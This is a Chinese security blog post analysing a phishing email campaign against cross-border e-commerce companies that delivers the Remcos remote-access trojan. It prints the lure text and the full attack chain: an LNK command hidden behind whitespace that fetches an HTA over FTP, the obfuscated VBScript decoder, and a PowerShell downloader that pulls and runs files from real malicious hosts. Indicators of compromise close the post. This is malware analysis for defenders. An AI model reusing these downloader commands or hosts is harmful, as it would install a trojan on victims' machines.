针对跨境电商的钓鱼邮件分析

admin
admin
admin
138643
文章
114
评论
2025年3月18日23:15:47评论4 views字数 4574阅读15分14秒阅读模式

1、邮件分析

近期收到某跨境企业客户举报发现钓鱼邮件,从发件人看上去都很正常。跨境电商绝对是黑阔的重点目标,重点受害群体。

针对跨境电商的钓鱼邮件分析

社工话术如下:

下午好, 

我们之前和贵公司下过订单,对贵公司的产品质量非常满意。由于这次积极的经历,我们想再下一个订单。随函附上我们希望购买的物品清单。请向我们提供这些产品的价格和运费到以下地址: 

Marigalante 427, De Las Americas, Heriberto Kehoe Vicent, 94299 Boca del Rio, Veracruz, Mexico 

我们期待您的快速回复,以便尽快完成您的订单。 

真诚, 

Anahy Zarate Cortes 

购买Manager 

PIASA小组

上传到deepphish发现,实际发件邮箱为“[email protected]”。因为有些邮件客户端只显示发件人display name,不显示具体邮箱,极具迷惑性,亮瞎我得钛金眼。

针对跨境电商的钓鱼邮件分析

发件人来源:5.149.253.242

针对跨境电商的钓鱼邮件分析

该邮件已经被客户的服务器打上了垃圾邮件标识,被隔离到了客户端垃圾箱中,但依然被员工点击中招,毕竟有个订单不容易🥲。

针对跨境电商的钓鱼邮件分析

查看邮箱正文部分诱导用户点击打开附件,附件实际为一个经过混淆加密的恶意程序。

2、样本分析

样本zip解压后为一个lnk文件,运行后会执行一段cmd命令。中间有一长串空格,用以迷惑用户看不到后面的命令参数信息。

C:Windowssystem32cmd.exe                           /c "curl.exe -s -u 63ddf818-a98c-4ac9-bc69-06cdd215ff96:05613769-3bf7-4da7-9571-fbac4cef4d5d -o %APPDATA%Acuerdo_de_Orden_de_Compra.hta ftp://45.11.59.49:6152/Acuerdo_de_Orden_de_Compra.hta" & %APPDATA%A
针对跨境电商的钓鱼邮件分析

命令从服器“ftp://45.11.59.49:6152/Acuerdo_de_Orden_de_Compra.hta”下载一个hta文件,该文件为vb代码。代码关键部分已经混淆,文件中字符通过方法进行加密

Function OGVFc(ByVal bVgkqJrMZ)    Dim YiRPUeDqt    Dim ESipMTyUZ    Dim JnYcOWFk    Dim oDTpZDEzL    YiRPUeDqt = VarType(bVgkqJrMZ)    oDTpZDEzL = bVgkqJrMZ(UBound(bVgkqJrMZ))    If YiRPUeDqt = ((2500 * 4) - 1000) + (100 * 5) - 296 - 1000 Then        For Each ESipMTyUZ In bVgkqJrMZ            JnYcOWFk = JnYcOWFk & Chr(ESipMTyUZ - oDTpZDEzL)        Next    Else        JnYcOWFk = Chr(bVgkqJrMZ - oDTpZDEzL)    End If    OGVFc = JnYcOWFkEnd Function

为方便分析使用AI将文本转换成js代码,将密文带入进行分析。

function OGVFc(bVgkqJrMZ) {    // 检查传入的参数是否为数组    const isArray = Array.isArray(bVgkqJrMZ);    // 获取数组的最后一个元素    const oDTpZDEzL = bVgkqJrMZ[bVgkqJrMZ.length - 1];    let JnYcOWFk = '';    if (isArray) {        // 如果是数组,遍历数组中的每个元素        for (let i = 0; i < bVgkqJrMZ.length; i++) {            const ESipMTyUZ = bVgkqJrMZ[i];            // 将每个元素减去最后一个元素,然后转换为对应的字符并拼接起来            JnYcOWFk += String.fromCharCode(ESipMTyUZ - oDTpZDEzL);        }    } else {        // 如果不是数组,直接将传入的参数减去最后一个元素,然后转换为对应的字符        JnYcOWFk = String.fromCharCode(bVgkqJrMZ - oDTpZDEzL);    }    return JnYcOWFk;}
针对跨境电商的钓鱼邮件分析

通过CreateObject ("Wscript.Shell").Run接口运行powersehll命令:

powershell.exe -ExecutionPolicy UnRestricted function l($hrwDwS$LskqypWSP){[IO.File]::WriteAllBytes($hrwDwS$LskqypWSP)};function J($hrwDwS){if($hrwDwS.EndsWith((rbf @(263,317,325,325))) -eq $True){Start-Process (rbf @(331,334,327,317,325,325,268,267,263,318,337,318)) $hrwDwS}else{Start-Process $hrwDwS}};function DPa($yPRsaVwn){$LRHJULvrp = New-Object (rbf @(295,318,333,263,304,318,315,284,325,322,318,327,333));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$LskqypWSP = $LRHJULvrp.DownloadData($yPRsaVwn);return $LskqypWSP};function rbf($wIwvny){$RWgnpEQyG=217;$cBobsYG=$Null;foreach($DuNIrxeq in $wIwvny){$cBobsYG+=[char]($DuNIrxeq-$RWgnpEQyG)};return $cBobsYG};function vXL(){$Fu = $env:APPDATA + '';$yfp = DPa (rbf @(321,333,333,329,332,275,264,264,326,314,331,334,315,318,327,322,263,316,316,264,282,316,334,318,331,317,328,312,317,318,312,296,331,317,318,327,312,317,318,312,284,328,326,329,331,314,263,329,317,319));$i = $Fu + 'Acuerdo_de_Orden_de_Compra.pdf';l $i $yfp;J $i;;$IAK = DPa (rbf @(321,333,333,329,332,275,264,264,326,314,331,334,315,318,327,322,263,316,316,264,326,329,316,325,322,318,327,333,263,317,325,325));$sx = $Fu + 'mpclient.dll';l $sx $IAK;J $sx;;$kUN = DPa (rbf @(321,333,333,329,332,275,264,264,326,314,331,334,315,318,327,322,263,316,316,264,282,316,334,318,331,317,328,312,317,318,312,296,331,317,318,327,312,317,318,312,284,328,326,329,331,314,263,318,337,318));$tM = $Fu + 'Acuerdo_de_Orden_de_Compra.exe';l $tM $kUN;J $tM;;}vXL;

该脚本会下载3个文件写入%APPDATA%目录,并打开运行。针对dll文件使用rundll32.exe进行加载

https://marubeni.cc/Acuerdo_de_Orden_de_Compra.pdfhttps://marubeni.cc/mpclient.dllhttps://marubeni.cc/Acuerdo_de_Orden_de_Compra.exe

其中“https://marubeni.cc/mpclient.dll”,为恶意文件。通过沙箱分析,确定该样本为商用木马Remcos,运行后连接远程地址“104.245.145.253:60142”。

Remcos 木马是一种远程访问木马(RAT),于 2016 年首次现身。传播途径:钓鱼邮件附件:常利用欺骗性钓鱼邮件附件,如 OLE Excel 格式的订单通知文档等,诱骗用户打开文件。 恶意下载程序:通过恶意 Microsoft 文档或下载程序进行传播,还曾在涉及 Fruity 恶意软件下载程序的攻击活动中被发现,诱使受害者下载 Fruity 下载程序来最终安装 Remcos。 利用漏洞:攻击者会利用软件漏洞传播该木马。如利用 CVE - 2017 - 0199 漏洞,通过包含恶意 Excel 文件的网络钓鱼邮件,文件中的 OLE 对象嵌有恶意 URL,打开后下载执行恶意 HTA 文件,最终将 Remcos 远控木马注入正常 Windows 进程。技术特点:多层混淆:采用多层混淆技术来逃避检测,使安全软件难以识别。 进程空洞化:将合法进程内存清空,再注入恶意代码,伪装成合法程序隐蔽运行。 反调试技术:具备反调试特性,增加分析和检测难度。 添加自启动项:通过修改注册表添加自启动项,实现长期驻留于已感染系统中。

针对跨境电商的钓鱼邮件分析

3、IOC

IP:

45.11.59[.]49:6152

104.245.145[.]253:60142

marubeni[.]cc

URL:

https://marubeni[.]cc/Acuerdo_de_Orden_de_Compra.pdf https://marubeni[.]cc/mpclient.dll https://marubeni[.]cc/Acuerdo_de_Orden_de_Compra.exe

Hash:

Acuerdo_de_Orden_de_Compra001.pdf.lnk e7e989bbbe54195821a0101cef794b356c1bdd318873913bc160d14d67fad788

mpclient.dll dafb468c7451141290f6684cf4d1bb4962cf77ce6e6f5d59662431e750510f6f

针对跨境电商的钓鱼邮件分析

点击阅读原文,打开deepphish。

原文始发于微信公众号(无限手套Infinity Gauntlet):针对跨境电商的钓鱼邮件分析

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月18日23:15:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   针对跨境电商的钓鱼邮件分析https://cn-sec.com/archives/3857061.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息